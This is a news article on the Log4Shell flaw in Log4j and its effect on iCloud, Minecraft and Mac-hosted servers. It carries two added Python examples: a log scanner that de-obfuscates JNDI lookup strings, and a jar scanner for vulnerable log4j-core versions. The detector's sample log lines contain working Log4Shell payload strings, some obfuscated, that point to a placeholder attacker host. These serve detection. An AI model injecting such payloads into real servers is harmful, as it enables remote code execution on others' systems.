Late last week, cybersecurity firm LunaSec published details of a critical vulnerability in the open-source Log4j logging library that lets an attacker run code of their choosing on any server that logs attacker-supplied text with a vulnerable version. The exploit, known as Log4Shell, was reported to affect countless apps and services, including iCloud and Minecraft.
According to the Eclectic Light Company, Apple has patched the iCloud hole. The site reports that researchers were able to demonstrate the vulnerability when connecting to iCloud through the web on December 9 and December 10, and that the same technique no longer worked on December 11. The exploit doesn’t appear to have affected macOS itself.
The vulnerability was exploited in Minecraft before Microsoft patched it over the weekend. According to security researchers, all an attacker had to do was paste a seemingly innocuous message into the chat box: the server logged the message with Log4j, which evaluated the lookup string hidden inside it and fetched code from a server the attacker controlled. The same technique works against any app that logs untrusted input with a vulnerable version of the free library.
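To show what the chat-message trick relies on, here is an added example, not code from the article or from the Log4j project: a Python detector that first undoes the string-substitution tricks attackers used to hide the word `jndi` and then flags log lines that contain a lookup a vulnerable Log4j would resolve over the network. The log lines are constructed, `attacker.example` is a placeholder hostname, and the three lookup forms it resolves (`lower`, `upper`, and the `:-` default syntax) are the ones seen in the widely circulated obfuscated payloads; Log4j itself supports many more.

```python
import re

# Constructed sample chat-log lines (not taken from the article or any real server).
# attacker.example is a placeholder hostname.
SAMPLE_LOG_LINES = [
    "[12:01:03] [Server thread/INFO]: <steve> hello everyone",
    "[12:01:09] [Server thread/INFO]: <alex> ${jndi:ldap://attacker.example/a}",
    "[12:01:15] [Server thread/INFO]: <mallory> ${${lower:j}ndi:${lower:LDAP}://attacker.example/b}",
    "[12:01:21] [Server thread/INFO]: <eve> ${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}",
    "[12:01:30] [Server thread/INFO]: <bob> price is ${100} dollars",
]

# An innermost lookup: ${...} whose body contains no further '$', '{' or '}'.
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# After normalisation, any lookup that hands a URL to the jndi: resolver.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:",
    re.IGNORECASE,
)


def resolve_lookup(body: str):
    """Resolve one innermost lookup body the way Log4j 2's string substitution
    does for the tricks used to hide the word 'jndi':
      ${lower:X} / ${upper:X}   -> X in the requested case
      ${anything:-X} / ${::-X}  -> the default value X (everything after ':-')
    Returns None for anything else (for example the jndi: lookup itself) so the
    caller leaves it in place and can inspect it afterwards.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[6:].lower()
    if lowered.startswith("upper:"):
        return body[6:].upper()
    return None


def normalize(text: str, max_rounds: int = 32) -> str:
    """Repeatedly resolve innermost lookups until the string stops changing.
    Every resolution removes at least the '${' and '}' wrapper, so the text only
    ever gets shorter and the loop terminates; max_rounds is a safety guard."""
    for _ in range(max_rounds):
        changed = False

        def _sub(match):
            nonlocal changed
            resolved = resolve_lookup(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNERMOST_LOOKUP.sub(_sub, text)
        if not changed:
            break
    return text


def is_log4shell_payload(line: str) -> bool:
    """True if the line, once de-obfuscated, contains a jndi: lookup that a
    vulnerable Log4j would resolve by contacting a remote server."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, normalised_line) for every suspicious line."""
    return [(n, normalize(line)) for n, line in enumerate(lines, 1)
            if is_log4shell_payload(line)]


if __name__ == "__main__":
    for n, shown in scan(SAMPLE_LOG_LINES):
        print(f"line {n}: {shown}")
```

A plain search for the text `jndi` catches only the second sample line; the third and fourth are the form that spread once the first signatures went live, which is why normalising before matching matters. URL-encoded payloads and lookups split across several log lines are out of scope for this example.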
It’s unclear how many apps are affected by the bug, but the use of Log4j is extremely widespread. CrowdStrike’s Adam Meyers said the vulnerability has been “fully weaponized” and tools were readily available to exploit it. “The internet’s on fire right now,” he added shortly after the exploit was made public.
The Apache Software Foundation, which runs the project, rated it 10.0, the maximum on the CVSS severity scale, because of the ease with which it can be exploited and the widespread use of the library. Log4j is used across the web for logging, a near-universal practice in Java server software. Apache has pushed out a fixed release, but the ubiquity of the Java library means many apps are still running vulnerable copies. Amit Yoran, CEO of cybersecurity firm Tenable, called it “the single biggest, most critical vulnerability of the last decade.”
However, even if you use one of the affected apps, your Mac itself is not the direct target. The bug is triggered on the server running Log4j, not on client computers, although an attacker who takes over a server could in principle use it to push a malicious app or update to connected machines. If you host your own server on your Mac, such as a Minecraft server or any other Java software that writes its logs with Log4j, update it to the fixed release now: you could be exposed without knowing it.
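If you run a server on your Mac, the practical check is whether any Java application on it bundles a vulnerable `log4j-core`. The following Python scanner is an added example, not code from the article or from Apache: it walks a directory, opens each jar as the zip archive it is, and reports jars whose `log4j-core` version is below the fixed release, jars of a vulnerable version from which the `JndiLookup` class has already been stripped (Apache's published stop-gap mitigation), and jars that embed that class under some other name (shaded application jars, which a filename check alone would miss). The demo tree it builds is constructed; the `2.15.0` threshold is the fix available when the article ran and is an assumption here, since later advisories raised the recommended floor, so pass the current value in.

```python
import os
import re
import sys
import tempfile
import zipfile

# Path inside log4j-core jars of the class that performs JNDI lookups. Deleting
# it from the jar was one of Apache's published mitigations for unpatched hosts.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# ASSUMPTION used as the threshold: 2.15.0 was the fixed release Apache shipped
# when this article ran. Later advisories raised the recommended floor, so pass
# the current value to scan_tree() rather than trusting this constant.
FIXED_VERSION = (2, 15, 0)

# log4j-core-2.14.1.jar, log4j-core-2.0-beta9.jar, ... (pre-release suffix ignored)
VERSION_RE = re.compile(r"log4j-core-(\d+)\.(\d+)(?:\.(\d+))?(?:-[A-Za-z0-9]+)?\.jar$")


def parse_log4j_core_version(name):
    """(major, minor, patch) from a log4j-core jar file name, else None."""
    m = VERSION_RE.search(os.path.basename(name))
    if not m:
        return None
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_vulnerable_version(version, fixed=FIXED_VERSION):
    """Log4Shell affects the 2.x line from 2.0 up to, but not including, the fix.
    Log4j 1.x is a different code base and is not flagged here."""
    return version is not None and (2, 0, 0) <= version < fixed


def jar_has_jndi_lookup(path):
    """True if the archive contains JndiLookup.class at the top level."""
    try:
        with zipfile.ZipFile(path) as zf:
            return JNDI_LOOKUP_CLASS in zf.namelist()
    except (zipfile.BadZipFile, OSError):
        return False


def classify_jar(path, fixed=FIXED_VERSION):
    """Return a finding for this jar, or None if nothing is wrong with it."""
    version = parse_log4j_core_version(path)
    has_class = jar_has_jndi_lookup(path)
    if version is None:
        # Not named like log4j-core: only interesting if it bundles the class
        # (a shaded or "fat" application jar), which a name-based check misses.
        return "embedded-jndilookup" if has_class else None
    if not is_vulnerable_version(version, fixed):
        return None
    return "vulnerable" if has_class else "jndilookup-removed"


def scan_tree(root, fixed=FIXED_VERSION):
    """Map of jar path (relative to root) -> finding, for every flagged jar.
    Jars nested inside .war/.ear archives are not descended into."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".jar"):
                continue
            path = os.path.join(dirpath, name)
            status = classify_jar(path, fixed)
            if status:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = status
    return findings


def build_demo_tree(root):
    """CONSTRUCTED demo data: empty zip archives named and populated like the
    jars a real server directory might contain, so the scanner runs offline."""
    def make_jar(relpath, entries):
        path = os.path.join(root, relpath)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with zipfile.ZipFile(path, "w") as zf:
            for entry in entries:
                zf.writestr(entry, b"")

    make_jar("server/lib/log4j-core-2.14.1.jar", [JNDI_LOOKUP_CLASS, "META-INF/MANIFEST.MF"])
    make_jar("server/lib/log4j-core-2.17.1.jar", [JNDI_LOOKUP_CLASS, "META-INF/MANIFEST.MF"])
    make_jar("server/lib/log4j-api-2.14.1.jar", ["META-INF/MANIFEST.MF"])
    make_jar("server/patched/log4j-core-2.14.1.jar", ["META-INF/MANIFEST.MF"])  # class stripped
    make_jar("server/myapp-all.jar", [JNDI_LOOKUP_CLASS, "com/example/App.class"])  # shaded
    make_jar("other/log4j-1.2.17.jar", ["org/apache/log4j/Logger.class"])


def run_demo():
    """Build the constructed tree in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else run_demo()
    for path, status in sorted(results.items()):
        print(f"{status:20} {path}")
```

Run it with the directory of the server you host as the argument; with no argument it scans the constructed demo tree. A `jndilookup-removed` result means the stop-gap mitigation is in place but the jar should still be upgraded, and `embedded-jndilookup` means an application jar carries its own copy of Log4j whose version you must determine from the bundled manifest or the vendor.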
Michael Simon has been covering Apple since the iPod was the iWalk. His obsession with technology goes back to his first PC—the IBM Thinkpad with the lift-up keyboard for swapping out the drive. He’s still waiting for that to come back in style tbh.